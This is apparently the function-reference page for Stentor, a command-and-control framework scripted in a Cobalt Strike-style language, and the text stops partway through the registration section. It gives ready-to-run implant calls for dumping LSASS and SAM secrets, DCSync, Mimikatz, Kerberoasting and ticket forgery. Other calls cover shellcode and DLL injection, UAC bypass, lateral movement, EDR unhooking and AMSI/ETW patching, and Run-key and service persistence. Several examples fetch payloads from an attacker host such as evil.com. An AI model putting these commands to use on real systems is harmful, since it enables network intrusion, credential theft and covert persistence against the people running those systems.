Function Reference¶

Complete reference for all Stentor CNA scripting functions. This page documents 310+ CNA functions and 46 Sleep language builtins organized by category. Each entry includes the function signature, parameter descriptions, return value, and a usage example.

Category Index¶

Beacon: Execution¶

bshell¶

bshell($bid, $cmd, [$cb]) -- Execute a command via cmd.exe /C.

Returns: $null

Dispatches: exec task to implant. Wraps command in cmd.exe /C.

bshell($1, "whoami /all");

brun¶

brun($bid, $cmd, [$cb]) -- Execute a command directly without cmd.exe wrapper.

Returns: $null

Dispatches: exec task to implant.

brun($1, "net user /domain");

bexecute¶

bexecute($bid, $cmd, [$cb]) -- Execute a command without output capture.

Returns: $null

Dispatches: exec task to implant.

bexecute($1, "notepad.exe");

bpowershell¶

bpowershell($bid, $cmd, [$cb]) -- Execute a PowerShell command via -EncodedCommand.

Returns: $null

Dispatches: exec task. Encodes as UTF-16LE base64. Prepends imported script if set via bpowershell_import.

bpowershell($1, "Get-Process | Select-Object Name, Id");

bpowershell_import¶

bpowershell_import($bid, $script_content) -- Import a PowerShell script for prepending to subsequent bpowershell calls.

Returns: $null

Note: Server-side only. Does NOT enqueue a task. The imported script is prepended to all subsequent bpowershell and bpowerpick calls.

$script = openf("/opt/scripts/PowerView.ps1");
bpowershell_import($1, readAll($script));
bpowershell($1, "Get-DomainUser -Identity admin");

bpowerpick¶

bpowerpick($bid, $cmd, [$cb]) -- Execute PowerShell via CLR shellcode injection (unmanaged PowerShell).

Returns: $null

Dispatches: inject task with CLR shellcode. Falls back to encoded PowerShell if relay unavailable.

bpowerpick($1, "Get-NetComputer -Ping");

bexecute_assembly¶

bexecute_assembly($bid, $assembly, [$args], [$cb]) -- Execute a .NET assembly in memory.

Returns: $null

Dispatches: exec_asm task. Converts assembly to shellcode via relay.

bexecute_assembly($1, "/opt/tools/Seatbelt.exe", "-group=all");

binline_execute¶

binline_execute($bid, $bof_data, $args, [$cb]) -- Execute a Beacon Object File (BOF) inline.

Returns: $null

Dispatches: bof task with entry point go.

$bof = readb(openf("/opt/bofs/whoami.o"), -1);
binline_execute($1, $bof, $null);

bext_execute¶

bext_execute($bid, $ext_name, [$args], [$cb]) -- Execute an installed extension on a beacon.

Returns: $null

Dispatches: extension task.

bext_execute($1, "nanodump", "--write C:\\temp\\lsass.dmp");

bext_list¶

bext_list() -- List installed extensions.

Returns: @() -- Empty Sleep array (stub). Extension listing is done via REST API.

@exts = bext_list();

Beacon: File Operations¶

bupload¶

bupload($bid, $path, [$cb]) -- Upload a file to the beacon.

Returns: $null

Dispatches: upload task.

bupload($1, "/opt/payloads/implant.exe");

bupload_raw¶

bupload_raw($bid, $remote_path, $data, [$cb]) -- Upload raw data to a remote path.

Returns: $null

Dispatches: upload task with raw content.

bupload_raw($1, "C:\\temp\\config.txt", "key=value\n");

bdownload¶

bdownload($bid, $path, [$cb]) -- Download a file from the beacon.

Returns: $null

Dispatches: download task.

bdownload($1, "C:\\Users\\Public\\secrets.txt");

bdownload_cancel¶

bdownload_cancel($bid, [$pattern]) -- Cancel an in-progress file download.

Returns: $null

bdownload_cancel($1, "*.zip");

bcancel¶

bcancel($bid, [$pattern]) -- Cancel pending downloads for a beacon.

Returns: $null

bcancel($1);

brm¶

brm($bid, $path, [$cb]) -- Remove a file on the target.

Returns: $null

Dispatches: fileops task with operation rm.

brm($1, "C:\\temp\\payload.exe");

bmkdir¶

bmkdir($bid, $path, [$cb]) -- Create a directory on the target.

Returns: $null

Dispatches: fileops task with operation mkdir.

bmkdir($1, "C:\\temp\\staging");

bcp¶

bcp($bid, $src, $dst, [$cb]) -- Copy a file on the target.

Returns: $null

Dispatches: fileops task with operation cp.

bcp($1, "C:\\Windows\\System32\\cmd.exe", "C:\\temp\\svc.exe");

bmv¶

bmv($bid, $src, $dst, [$cb]) -- Move a file on the target.

Returns: $null

Dispatches: fileops task with operation mv.

bmv($1, "C:\\temp\\old.txt", "C:\\temp\\new.txt");

bdrives¶

bdrives($bid, [$cb]) -- List drives on the target.

Returns: $null

Dispatches: fileops task with operation drives.

bdrives($1);

bls¶

bls($bid, $path, [$cb]) -- List directory contents.

Returns: $null

Dispatches: fileops task with operation ls.

bls($1, "C:\\Users\\Public");

Beacon: Process Management¶

bps¶

bps($bid, [$cb]) -- List running processes.

Returns: $null

Dispatches: ps task.

bps($1);

bkill¶

bkill($bid, $pid, [$cb]) -- Kill a process by PID.

Returns: $null

Dispatches: kill task.

bkill($1, 4592);

bjobs¶

bjobs($bid, [$cb]) -- List active post-exploitation jobs.

Returns: $null

Dispatches: jobs task.

bjobs($1);

bjobkill¶

bjobkill($bid, $job_id, [$cb]) -- Kill a specific job.

Returns: $null

Dispatches: jobkill task.

bjobkill($1, "3");

Beacon: Configuration¶

bsleep¶

bsleep($bid, $interval, [$jitter]) -- Set beacon sleep interval and jitter.

Returns: $null

Note: Registry-only update. Beacon picks up new values on next check-in.

bsleep($1, 60, 20);  # Sleep 60s with 20% jitter

bsleepu¶

bsleepu($bid, $sleep_string) -- Set sleep using human-readable duration string.

Returns: $null

bsleepu($1, "5m 30s 25j");  # 5 min 30s, 25% jitter

bspawnto¶

bspawnto($bid, $arch, $path) -- Set the fork-and-run sacrificial process.

Returns: $null

bspawnto($1, "x64", "C:\\Windows\\System32\\dllhost.exe");

bargue¶

bargue($bid, $action, [$process], [$fake_args]) -- Manage argument spoofing rules.

Returns: $null

Dispatches: argue task.

bargue($1, "add", "cmd.exe", "/C echo hello");
bargue($1, "list");
bargue($1, "remove", "cmd.exe");

bargue_add¶

bargue_add($bid, $process, $fake_args) -- Add an argument spoofing rule.

Returns: $null

bargue_add($1, "powershell.exe", "-Version 5.1");

bargue_list¶

bargue_list($bid) -- List all argument spoofing rules.

Returns: $null

bargue_list($1);

bargue_remove¶

bargue_remove($bid, $process) -- Remove an argument spoofing rule.

Returns: $null

bargue_remove($1, "powershell.exe");

bppid¶

bppid($bid, $pid) -- Set PPID spoofing target.

Returns: $null

bppid($1, 1234);  # Spoof PPID to 1234
bppid($1, 0);     # Disable PPID spoofing

bblockdlls¶

bblockdlls($bid, $enabled) -- Toggle BlockDLLs policy for fork-and-run operations.

Returns: $null

bblockdlls($1, true);  # Block non-Microsoft DLLs

bmode¶

bmode($bid, $mode) -- Change the beacon's DNS transport mode.

Returns: $null

Dispatches: transport_mode task.

bmode($1, "dns-txt");

bexit¶

bexit($bid) -- Instruct the beacon to terminate.

Returns: $null

Dispatches: exit task.

bexit($1);

bcheckin¶

bcheckin($bid) -- Force the beacon to call home and re-send metadata.

Returns: $null

Dispatches: checkin task.

bcheckin($1);

blink¶

blink($bid, $target, [$pipename]) -- Connect to a P2P beacon via SMB named pipe.

Returns: $null

Dispatches: p2p_connect task.

blink($1, "DC01");
blink($1, "DC01", "\\\\.\\pipe\\custom");

bunlink¶

bunlink($bid, $child_beacon_id) -- Disconnect a child P2P beacon link.

Returns: $null

Dispatches: p2p_unlink task.

bunlink($1, $child_id);

bpause¶

bpause($bid, $ms) -- Enqueue a one-off pause task.

Returns: $null

Dispatches: pause task.

bpause($1, 5000);  # Pause 5 seconds

bsyscall_method¶

bsyscall_method($bid, $method) -- Set the beacon's syscall invocation method.

Returns: $null

bsyscall_method($1, "Indirect");

bbeacon_config¶

bbeacon_config($bid) -- Get beacon configuration as a hash.

Returns: %hash with keys: sleep, jitter, arch, os, hostname, username, ip, pid, id, syscall_method.

%config = bbeacon_config($1);
println("Sleep: " . %config["sleep"]);

bbeacon_gate¶

bbeacon_gate($bid, $enabled) -- Toggle BeaconGate (indirect syscalls on sensitive APIs).

Returns: $null

bbeacon_gate($1, true);

Beacon: Credentials¶

bhashdump¶

bhashdump($bid, [$cb]) -- Dump SAM hashes from the target.

Returns: $null

Dispatches: creds task with method sam_dump.

bhashdump($1);

blogonpasswords¶

blogonpasswords($bid, [$cb]) -- Dump logon passwords from LSASS.

Returns: $null

Dispatches: creds task with method lsass.

blogonpasswords($1);

bdcsync¶

bdcsync($bid, $domain, $user, [$cb]) -- Perform DCSync replication attack.

Returns: $null

Dispatches: creds task with method dcsync.

bdcsync($1, "corp.local", "krbtgt");

bmimikatz¶

bmimikatz($bid, $command, [$cb]) -- Run a Mimikatz command.

Returns: $null

Dispatches: creds task with method lsass.

bmimikatz($1, "sekurlsa::logonpasswords");

bmimikatz_small¶

bmimikatz_small($bid, $command, [$cb]) -- Run Mimikatz in-process (smaller footprint).

Returns: $null

Dispatches: creds task with method mimikatz_small.

bmimikatz_small($1, "coffee");

bkerberoast¶

bkerberoast($bid, [$domain, $user, $password], [$cb]) -- Perform Kerberoasting attack.

Returns: $null

Dispatches: creds task with method kerberoast.

bkerberoast($1);                                    # SSPI mode
bkerberoast($1, "corp.local", "svc_sql", "Pass1");  # Explicit creds

bkerberos_ccache_use¶

bkerberos_ccache_use($bid, $ccache_path, [$cb]) -- Import a ccache file for Kerberos auth.

Returns: $null

bkerberos_ccache_use($1, "C:\\temp\\krb5cc_admin");

bkerberos_ticket_purge¶

bkerberos_ticket_purge($bid, [$cb]) -- Purge all Kerberos tickets.

Returns: $null

bkerberos_ticket_purge($1);

bkerberos_ticket_use¶

bkerberos_ticket_use($bid, $ticket_data, [$cb]) -- Apply a base64-encoded Kerberos ticket.

Returns: $null

bkerberos_ticket_use($1, $b64_ticket);

bpassthehash¶

bpassthehash($bid, $domain, $user, $ntlm_hash, [$cb]) -- Pass-the-Hash attack.

Returns: $null

Dispatches: identity task with technique pth.

bpassthehash($1, "CORP", "admin", "aad3b435b...");

bloginuser¶

bloginuser($bid, $domain, $user, $password, [$cb]) -- Log in with explicit credentials.

Returns: $null

Dispatches: identity task with technique login_user.

bloginuser($1, "CORP", "admin", "Password123!");

bprinterbug¶

bprinterbug($bid, $target, $listener, [$domain_user, $password], [$cb]) -- Trigger PrinterBug (MS-RPRN) coercion.

Returns: $null

Dispatches: coerce task with method printerbug.

bprinterbug($1, "DC01.corp.local", "attacker.local");

bpetitpotam¶

bpetitpotam($bid, $target, $listener, [$domain_user, $password], [$cb]) -- Trigger PetitPotam (MS-EFSRPC) coercion.

Returns: $null

Dispatches: coerce task with method petitpotam.

bpetitpotam($1, "DC01", "attacker.local");

bfind_delegation¶

bfind_delegation($bid, [$dc, $domain, $cb]) -- Enumerate delegation configurations via LDAP.

Returns: $null

Dispatches: discovery task with method find_delegation.

bfind_delegation($1);

bticket_dump¶

bticket_dump($bid, [$cb]) -- Extract TGTs from LSASS ticket cache.

Returns: $null

Dispatches: kerberos task with method ticket_dump.

bticket_dump($1);

bs4u¶

bs4u($bid, $impersonate_user, $target_spn, $svc_user, $svc_password, $domain, [$dc, $cb]) -- S4U2Self + S4U2Proxy constrained delegation abuse.

Returns: $null

bs4u($1, "admin", "cifs/DC01", "svc_sql", "Pass1!", "corp.local");

brbcd¶

brbcd($bid, $target, [$impersonate_user, $domain, $dc, $cb]) -- RBCD attack chain.

Returns: $null

brbcd($1, "WEB01");

bgpo¶

bgpo($bid, $gpo_name, $command, [$arguments, $domain, $dc, $cb]) -- GPO abuse for domain-wide code execution.

Returns: $null

bgpo($1, "Default Domain Policy", "C:\\temp\\beacon.exe");

bdcshadow¶

bdcshadow($bid, $target_dn, $attribute, $value, [$domain, $dc, $cb]) -- DCShadow attack.

Returns: $null

bdcshadow($1, "CN=admin,CN=Users,DC=corp,DC=local", "description", "owned");

bdiamondticket¶

bdiamondticket($bid, $domain, $domain_sid, $dc, $krbtgt_key, [$impersonate, $cb]) -- Forge a Diamond Ticket.

Returns: $null

bdiamondticket($1, "corp.local", "S-1-5-21-...", "DC01", $krbtgt_key, "admin");

bsapphireticket¶

bsapphireticket($bid, $domain, $dc, $krbtgt_key, $impersonate, [$cb]) -- Forge a Sapphire Ticket.

Returns: $null

bsapphireticket($1, "corp.local", "DC01", $key, "admin");

bskeletonkey¶

bskeletonkey($bid, [$password, $cb]) -- Inject skeleton key into LSASS.

Returns: $null

bskeletonkey($1);

blaps¶

blaps($bid, [$target, $cb]) -- Read LAPS passwords via LDAP.

Returns: $null

blaps($1);            # Dump all LAPS passwords
blaps($1, "WEB01$");  # Specific target

bgmsa¶

bgmsa($bid, [$target, $cb]) -- Read gMSA passwords via LDAP.

Returns: $null

bgmsa($1);

btrustenum¶

btrustenum($bid, [$cb]) -- Enumerate AD trusts.

Returns: $null

btrustenum($1);

bgoldenticket¶

bgoldenticket($bid, $domain, $domain_sid, $dc, $krbtgt_key, [$extra_sids, $cb]) -- Forge a Golden Ticket.

Returns: $null

bgoldenticket($1, "corp.local", "S-1-5-21-...", "DC01", $key);

bsidhistory¶

bsidhistory($bid, $target, $sids, [$mode, $cb]) -- Inject SID History attributes.

Returns: $null

bsidhistory($1, "admin", "S-1-5-21-...-519");

Beacon: Injection¶

binject¶

binject($bid, $pid, $listener, $arch, [$cb]) -- Inject a beacon into a running process.

Returns: $null

Dispatches: inject task. Generates beacon shellcode via relay.

binject($1, 4592, "HTTPS", "x64");

bshinject¶

bshinject($bid, $pid, $arch, $shellcode, [$cb]) -- Inject raw shellcode into a process.

Returns: $null

Dispatches: inject task with method shinject.

bshinject($1, 4592, "x64", $shellcode);

bshspawn¶

bshspawn($bid, $arch, $shellcode, [$cb]) -- Spawn sacrificial process and inject shellcode (fork-and-run).

Returns: $null

Dispatches: shspawn task.

bshspawn($1, "x64", $shellcode);

bdllspawn¶

bdllspawn($bid, $dll, $arg, $desc, $timeout, $arch, [$cb]) -- Fork-and-run DLL execution.

Returns: $null

Dispatches: inject task with method dllspawn.

bdllspawn($1, $dll_bytes, "", "mimikatz", 30, "x64");

bdllinject¶

bdllinject($bid, $pid, $dll_path, [$cb]) -- Inject a DLL into a process by path.

Returns: $null

Dispatches: inject task with method dllinject.

bdllinject($1, 4592, "C:\\temp\\evil.dll");

bdllload¶

bdllload($bid, $pid, $path, [$cb]) -- Load a DLL via LoadLibrary.

Returns: $null

Dispatches: interop task with method dllload.

bdllload($1, 4592, "C:\\temp\\helper.dll");

Beacon: Jobs¶

bjoblog¶

bjoblog($bid, $message) -- Broadcast job output to console.

Returns: $null

Note: Console-only, no task enqueued.

bjoblog($1, "Keylogger captured 42 keystrokes");

bjob_send_data¶

bjob_send_data($bid, $job_id, $data, [$cb]) -- Send data to a running job.

Returns: $null

Dispatches: postex task with method job_send_data.

bjob_send_data($1, "3", "input data");

bjoberror¶

bjoberror($bid, $message) -- Broadcast job error to console.

Returns: $null

Note: Console-only, no task enqueued.

bjoberror($1, "Job failed: access denied");

Beacon: Lateral Movement¶

bjump¶

bjump($bid, $method, $target, $listener, [$cb]) -- Lateral movement with payload generation.

Returns: $null

Dispatches: lateral task. Generates payload via relay.

bjump($1, "psexec64", "DC01", "HTTPS");

bremote_exec¶

bremote_exec($bid, $method, $target, $command, [$cb]) -- Execute command on remote host.

Returns: $null

Dispatches: lateral task.

bremote_exec($1, "wmi", "DC01", "whoami");

bpsexec¶

bpsexec($bid, $target, $listener, $service_name, [$cb]) -- Service-based lateral movement.

Returns: $null

Dispatches: lateral task. Generates service EXE via relay.

bpsexec($1, "DC01", "HTTPS", "svchost_update");

bwmi¶

bwmi($bid, $target, $command, [$cb]) -- WMI remote command execution.

Returns: $null

bwmi($1, "DC01", "C:\\temp\\beacon.exe");

bwinrm¶

bwinrm($bid, $target, $command, [$cb]) -- WinRM remote command execution.

Returns: $null

bwinrm($1, "DC01", "whoami");

bpsexec_command¶

bpsexec_command($bid, $target, $command, [$cb]) -- PsExec command execution (no payload).

Returns: $null

bpsexec_command($1, "DC01", "net user admin /domain");

Beacon: Network¶

bportscan¶

bportscan($bid, $targets, $ports, $method, $maxconn, [$cb]) -- Port scan targets.

Returns: $null

Dispatches: discovery task with method portscan.

bportscan($1, "10.10.10.0/24", "445,3389,5985", "arp", 1024);

bnet¶

bnet($bid, $command, [$arg1], [$arg2]) -- Network enumeration commands.

Returns: $null

Dispatches: discovery task with method net_<command>.

bnet($1, "domain");
bnet($1, "share", "DC01");
bnet($1, "group", "DC01", "Domain Admins");

bsocks_start¶

bsocks_start($bid, $port, [$user, $pass]) -- Start a SOCKS proxy.

Returns: $null

Note: Server-side operation. No beacon task enqueued.

bsocks_start($1, 1080);
bsocks_start($1, 1080, "user", "pass");

bsocks_stop¶

bsocks_stop($bid) -- Stop the SOCKS proxy.

Returns: $null

bsocks_stop($1);

bsocks¶

bsocks($bid, $port, [$user, $pass]) -- Alias for bsocks_start.

bsocks($1, 1080);

brportfwd¶

brportfwd($bid, $bind_port, $dest_host, $dest_port) -- Reverse port forward.

Returns: $null

Dispatches: rportfwd task.

brportfwd($1, 8443, "127.0.0.1", 443);

brportfwd_stop¶

brportfwd_stop($bid, $bind_port) -- Stop a reverse port forward.

Returns: $null

brportfwd_stop($1, 8443);

brportfwd_local¶

brportfwd_local($bid, $bind_port, $dest_host, $dest_port, [$cb]) -- Local reverse port forward.

Returns: $null

brportfwd_local($1, 8080, "10.10.10.5", 80);

bipconfig¶

bipconfig($bid, [$cb]) -- Query network configuration.

Returns: $null

Dispatches: discovery task with method ipconfig.

bipconfig($1);

bconnect¶

bconnect($bid, $host, $port, [$cb]) -- TCP P2P beacon connection.

Returns: $null

Dispatches: p2p_connect task with protocol tcp.

bconnect($1, "10.10.10.5", 4444);

bcovertvpn¶

bcovertvpn($bid, $interface, [$cb]) -- Covert VPN (not yet supported).

Note: Returns an error message. Use brportfwd instead.

bspunnel¶

bspunnel($bid, $target, $port, $listener, [$cb]) -- Reverse port forward tunnel (not yet supported).

Note: Returns an error message. Use brportfwd instead.

bspunnel_local¶

bspunnel_local($bid, $target, $port, $listener, [$cb]) -- Local reverse port forward tunnel (not yet supported).

Note: Returns an error message. Use brportfwd_local instead.

Beacon: Output¶

btask¶

btask($bid, $description, [$tactic]) -- Display task description in console.

Returns: $null

Note: Console-only, no task enqueued.

btask($1, "Dumping SAM hashes", "T1003.002");

binput¶

binput($bid, $message) -- Display input message in console.

Returns: $null

binput($1, "hashdump");

blog¶

blog($bid, $message) -- Display output message in console.

Returns: $null

blog($1, "Administrator:500:aad3...:31d6...");

berror¶

berror($bid, $message) -- Display error message in console.

Returns: $null

berror($1, "Access denied - need SYSTEM privileges");

Beacon: PowerShell¶

bpsinject¶

bpsinject($bid, $pid, $command, [$cb]) -- Inject PowerShell into a specific process.

Returns: $null

Dispatches: inject task with technique psinject.

bpsinject($1, 4592, "Get-Process");

bpowershell_import_clear¶

bpowershell_import_clear($bid) -- Clear the imported PowerShell script.

Returns: $null

bpowershell_import_clear($1);

Beacon: Privilege Escalation¶

bgetsystem¶

bgetsystem($bid, [$cb]) -- Elevate to SYSTEM via named pipe impersonation.

Returns: $null

Dispatches: privesc task with method getsystem. Requires High integrity.

bgetsystem($1);

belevate¶

belevate($bid, $exploit, $listener, [$cb]) -- Run a UAC bypass exploit.

Returns: $null

Dispatches: privesc task. Generates EXE payload via relay.

belevate($1, "uac-cmstplua", "HTTPS");

brunasadmin¶

brunasadmin($bid, $exploit, $command, [$cb]) -- Run a command with admin privileges via UAC bypass.

Returns: $null

Dispatches: privesc task with method runasadmin.

brunasadmin($1, "uac-fodhelper", "C:\\temp\\beacon.exe");

bspawnas¶

bspawnas($bid, $domain, $user, $password, $listener, [$cb]) -- Spawn a beacon as another user.

Returns: $null

Dispatches: identity task with method spawnas. Generates shellcode via relay.

bspawnas($1, "CORP", "admin", "Pass1!", "HTTPS");

brunas¶

brunas($bid, $domain, $user, $password, $command, [$cb]) -- Run a command as another user.

Returns: $null

Dispatches: identity task with method runas.

brunas($1, "CORP", "admin", "Pass1!", "whoami /all");

Beacon: Queue¶

bclear¶

bclear($bid) -- Clear all pending tasks for a beacon.

Returns: $null

Note: Server-side queue operation.

bclear($1);

bread_pipe¶

bread_pipe($bid, $pipename, [$cb]) -- Read from a named pipe.

Returns: $null

Dispatches: postex task with method read_pipe.

bread_pipe($1, "\\\\.\\pipe\\custom_pipe");

blog2¶

blog2($bid, $message) -- Display secondary output in console.

Returns: $null

Note: Console-only (type output2). Distinct from blog (type output).

blog2($1, "Additional details...");

Beacon: Reconnaissance¶

bscreenshot($1);

bscreenwatch($1, 30);

bkeylogger($1);

bchromiumdump($1);

bdesktop($1);

bnote($1, "DA beacon on DC01");

bcd($1, "C:\\Users\\admin\\Desktop");

bpwd($1);

bsetenv($1, "PATH", "C:\\temp;%PATH%");

btimestomp($1, "C:\\temp\\evil.exe", "C:\\Windows\\System32\\svchost.exe");

bchmod($1, "/tmp/payload", "755");

bldap_query($1, "DC=corp,DC=local", "(objectClass=user)", "sAMAccountName mail");

bedr_query($1);

bedr_unhook($1, "knowndlls");

bhwbp($1, "amsi");
bhwbp($1, "etw", false);

bsleep_config($1, "sleep_mask", "on");
bsleep_config($1, "method", "WaitForSingleObject");

bprintscreen($1);

bclipboard($1);

bbrowser($1);

bbrowserpivot($1, 8752, 8080);

bbrowserpivot_stop($1);

bbits_download($1, "http://evil.com/payload.exe", "C:\\temp\\update.exe");

bbits_persist($1, "http://evil.com/a.exe", "C:\\temp\\a.exe", "C:\\temp\\a.exe");

bbits_list($1);

bbits_cancel($1);
bbits_cancel($1, "MyJob");

Beacon: Registry & Services¶

breg_query¶

breg_query($bid, $hive, $path, [$cb]) -- Query a registry key.

Returns: $null

Dispatches: registry task with operation query.

breg_query($1, "HKLM", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");

breg_queryv¶

breg_queryv($bid, $hive, $path, $name, [$cb]) -- Query a specific registry value.

breg_queryv($1, "HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName");

breg_set¶

breg_set($bid, $hive, $path, $name, $type, $value, [$cb]) -- Set a registry value.

breg_set($1, "HKCU", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "Updater", "REG_SZ", "C:\\temp\\svc.exe");

breg_delete¶

breg_delete($bid, $hive, $path, [$name], [$cb]) -- Delete a registry key or value.

breg_delete($1, "HKCU", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "Updater");

bservice_register¶

bservice_register($bid, $name, $display, $exe, [$cb]) -- Register a Windows service.

bservice_register($1, "UpdateSvc", "Windows Update Helper", "C:\\temp\\svc.exe");

bservice_delete¶

bservice_delete($bid, $name, [$cb]) -- Delete a Windows service.

bservice_delete($1, "UpdateSvc");

Beacon: Spawn & Identity¶

bspawn¶

bspawn($bid, $listener, [$arch], [$cb]) -- Spawn a new beacon session.

Dispatches: spawn task. Generates shellcode via relay.

bspawn($1, "HTTPS");
bspawn($1, "HTTPS", "x86");

bspawnu¶

bspawnu($bid, $pid, $listener, [$cb]) -- Spawn beacon under another process (PPID spoofing).

bspawnu($1, 1234, "HTTPS");

brunu¶

brunu($bid, $pid, $command, [$cb]) -- Run command in context of another process.

brunu($1, 1234, "whoami");

belevate_command¶

belevate_command($bid, $exploit, $command, [$cb]) -- Elevate and run a command.

belevate_command($1, "uac-cmstplua", "C:\\temp\\beacon.exe");

Beacon: SSH¶

bssh¶

bssh($bid, $host, $port, $user, $pass, [$cb]) -- Initiate SSH session.

bssh($1, "10.10.10.5", 22, "root", "<relay-password>");

bssh_command¶

bssh_command($bid, $command, [$cb]) -- Execute command in SSH session.

bssh_command($1, "id && uname -a");

bssh_key¶

bssh_key($bid, $host, $port, $user, $key_path, [$cb]) -- SSH with key-based auth.

bssh_key($1, "10.10.10.5", 22, "root", "/tmp/id_rsa");

bsudo¶

bsudo($bid, $password, $command, [$cb]) -- Execute command with sudo.

bsudo($1, "password", "cat /etc/shadow");

Beacon: Token¶

bsteal_token¶

bsteal_token($bid, $pid, [$cb]) -- Steal a token from a process.

Dispatches: identity task with technique steal_token.

bsteal_token($1, 4592);

bmake_token¶

bmake_token($bid, $domain, $user, $password, [$cb]) -- Create a token with credentials.

Dispatches: identity task with technique make_token.

bmake_token($1, "CORP", "admin", "Password1!");

bgetuid¶

bgetuid($bid, [$cb]) -- Get current user identity.

bgetuid($1);

brev2self¶

brev2self($bid, [$cb]) -- Revert to original token.

brev2self($1);

bgetprivs¶

bgetprivs($bid, [$cb]) -- Query token privileges.

bgetprivs($1);

btoken_store_steal¶

btoken_store_steal($bid, $pid, [$cb]) -- Steal and store a token.

btoken_store_steal($1, 4592);

btoken_store_use¶

btoken_store_use($bid, $token_id, [$cb]) -- Apply a stored token.

btoken_store_use($1, 0);

btoken_store_remove¶

btoken_store_remove($bid, $token_id, [$cb]) -- Remove a stored token.

btoken_store_remove($1, 0);

btoken_store_show¶

btoken_store_show($bid, [$cb]) -- List all stored tokens.

btoken_store_show($1);

btoken_store_remove_all¶

btoken_store_remove_all($bid, [$cb]) -- Clear all stored tokens.

btoken_store_remove_all($1);

btoken_store_steal_and_use¶

btoken_store_steal_and_use($bid, $pid, [$cb]) -- Steal, store, and immediately apply a token.

btoken_store_steal_and_use($1, 4592);

Beacon: Data / Info¶

bdata¶

bdata($bid) -- Get all beacon metadata as a hash.

Returns: %hash with keys: id, computer, user, internal, os, barch, pid, note, sleep, jitter, last, alive.

%info = bdata($1);
println("Host: " . %info["computer"] . " User: " . %info["user"]);

binfo¶

binfo($bid, $key) -- Get a specific beacon metadata field.

Returns: The field value, or $null if not found.

$host = binfo($1, "computer");

bdata_store_load¶

bdata_store_load($bid, $slot, [$cb]) -- Load a data store slot.

bdata_store_load($1, "config");

bdata_store_unload¶

bdata_store_unload($bid, $slot, [$cb]) -- Unload a data store slot.

bdata_store_unload($1, "config");

bdata_store_list¶

bdata_store_list($bid, [$cb]) -- List all data store slots.

bdata_store_list($1);

Data Model¶

beacons¶

beacons() -- Get all active beacons.

Returns: @array of %hash entries with beacon metadata.

foreach $beacon (beacons()) {
    println(binfo($beacon["id"], "computer"));
}

beacon_info¶

beacon_info($bid, $key) -- Get beacon info by key (alias for binfo).

$os = beacon_info($bid, "os");

data_keys¶

data_keys() -- List available data model keys.

Returns: @array of available key names.

println(data_keys());

data_query¶

data_query($key) -- Query a data model key.

Returns: Data for the specified key.

@results = data_query("credentials");

credentials¶

credentials() -- Get all harvested credentials.

Returns: @array of %hash credential entries.

foreach $cred (credentials()) {
    println(%cred["user"] . ":" . %cred["password"]);
}

targets¶

targets() -- Get all discovered targets.

Returns: @array of %hash target entries.

foreach $target (targets()) {
    println(%target["address"]);
}

downloads¶

downloads() -- Get all file downloads.

Returns: @array of download records.

@files = downloads();

keystrokes¶

keystrokes() -- Get all captured keystrokes.

Returns: @array of keystroke records.

@keys = keystrokes();

screenshots¶

screenshots() -- Get all captured screenshots.

Returns: @array of screenshot records.

@shots = screenshots();

archives¶

archives() -- Get all archived data.

Returns: @array of archive records.

@data = archives();

applications¶

applications() -- Get discovered applications.

Returns: @array of application records.

@apps = applications();

listeners¶

listeners() -- Get all configured listeners.

Returns: @array of %hash listener entries.

foreach $listener (listeners()) {
    println(%listener["name"] . " - " . %listener["host"]);
}

listener_info¶

listener_info($name, $key) -- Get listener info by key.

$host = listener_info("HTTPS", "host");

sites¶

sites() -- Get all hosted sites.

Returns: @array of site records.

@hosted = sites();

Dialog & UI¶

prompt_text("Enter IP", "Target IP address:", &callback);

prompt_confirm("Confirm", "Are you sure?", &callback);

prompt_file_open("Select BOF", &callback);

$dialog = dialog("My Tool", %(target => ""), &callback);

dialog_description($dialog, "Configure the attack parameters.");

dialog_show($dialog);

drow_text($dialog, "target", "Target IP:");
drow_text_big($dialog, "script", "PowerShell Script:");

drow_combobox($dialog, "arch", "Architecture:", @("x64", "x86"));

drow_checkbox($dialog, "verbose", "Verbose output");

Output & Events¶

say¶

say($message) -- Broadcast a chat message to all operators.

say("Attack complete - check targets tab");

elog¶

elog($message) -- Log an event message.

elog("Credentials harvested: 15 entries");

action¶

action($message) -- Broadcast an action message (IRC-style).

action("started lateral movement to DC01");

privmsg¶

privmsg($target, $message) -- Send a private message.

privmsg("operator2", "Ready to escalate");

custom_event¶

custom_event($event_name, $data) -- Fire a custom event.

custom_event("my_scanner_done", %results);

custom_event_private¶

custom_event_private($event_name, $data) -- Fire a private custom event.

custom_event_private("scan_complete", %data);

chat_private¶

chat_private($target, $message) -- Send private chat.

event_private¶

event_private($event_name, $data) -- Fire private event.

event_notify¶

event_notify($title, $message) -- Show UI notification.

event_notify("New Beacon", "Beacon from DC01 checked in");

Tab & Visualization¶

addTab¶

addTab($title, $callback) -- Add a custom tab to the UI.

addTab("My Tool", &my_tab_handler);

addVisualization¶

addVisualization($name, $callback) -- Register a custom visualization.

addVisualization("attack_graph", &render_graph);

showVisualization¶

showVisualization($name) -- Display a registered visualization.

showVisualization("attack_graph");

Menu¶

popup_clear¶

popup_clear($hook) -- Clear all popup menu items from a hook.

popup_clear("beacon_top");

menubar¶

menubar($label, $callback) -- Add a top-level menu bar item.

menubar("My Tools", &my_menu);

Registration¶

beacon_command_register¶

beacon_command_register($name, $description, $usage) -- Register a custom beacon command.

beacon_command_register("scan", "Run port scan", "scan [targets] [ports]");

beacon_exploit_register¶

beacon_exploit_register($name, $description, $callback) -- Register an elevation exploit.

beacon_exploit_register("my_uac", "Custom UAC bypass", &my_exploit_handler);

beacon_remote_exploit_register¶

beacon_remote_exploit_register($name, $description, $arch, $callback) -- Register a lateral movement technique.

beacon_remote_exploit_register("my_lateral", "Custom lateral", "x64", &handler);

beacon_remote_exec_method_register¶

beacon_remote_exec_method_register($name, $callback) -- Register a remote-exec method.

beacon_remote_exec_method_register("my_exec", &handler);

beacon_command_describe¶

beacon_command_describe($name) -- Get command description.

Returns: string description or "".

beacon_command_detail¶

beacon_command_detail($name) -- Get command usage details.

Returns: string usage or "".

beacon_command_group¶

beacon_command_group($name) -- Get command group/category.

Returns: string (stub, returns "").

beacon_commands¶

beacon_commands() -- List all available commands.

Returns: @array of sorted command names.

foreach $cmd (beacon_commands()) {
    println($cmd);
}

beacon_exploits¶

